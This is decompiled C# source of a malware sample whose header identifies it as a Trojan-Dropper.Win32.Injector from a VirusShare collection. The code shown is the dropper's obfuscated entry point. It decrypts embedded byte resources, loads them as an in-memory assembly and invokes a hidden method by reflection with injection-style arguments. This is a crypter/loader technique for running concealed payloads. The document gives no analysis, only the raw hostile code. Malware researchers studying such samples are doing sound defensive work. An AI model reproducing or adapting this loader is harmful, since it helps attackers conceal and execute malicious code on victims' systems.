// Decompiled with JetBrains decompiler // Type:  // Assembly: crypted, Version=4.9.4.5, Culture=neutral, PublicKeyToken=null // MVID: 39ED6F8C-EF75-4E88-8706-EBD78B0ECCC1 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Injector.elwj-8012f8d9cbc27bdc5242e812bac1932349108916abac095e249196a1ff3b491d.exe using Microsoft.VisualBasic.CompilerServices; using System; using System.Reflection; using System.Threading; public sealed class \u0008 { [STAThread] public static void \u0002() { Thread.Sleep(0); Assembly.Load(\u0006.\u0002((byte[]) NewLateBinding.LateIndexGet(\u000E.\u0002.GetObject(\u000F.\u0002(2060968482)), new object[1] { (object) 1 }, (string[]) null), \u000F.\u0002(2060968508))).GetType(\u0006.\u0002(\u000F.\u0002(2060968470), \u000F.\u0002(2060968549))).GetMethod(\u0006.\u0002(\u000F.\u0002(2060968566), \u000F.\u0002(2060968521))).Invoke((object) null, new object[6] { (object) \u0006.\u0002((byte[]) NewLateBinding.LateIndexGet(\u000E.\u0002.GetObject(\u000F.\u0002(2060968482)), new object[1] { (object) 0 }, (string[]) null), \u000F.\u0002(2060968538)), (object) true, (object) \u000E.\u0008, (object) \u000F.\u0002(2060968628), (object) true, (object) false }); } }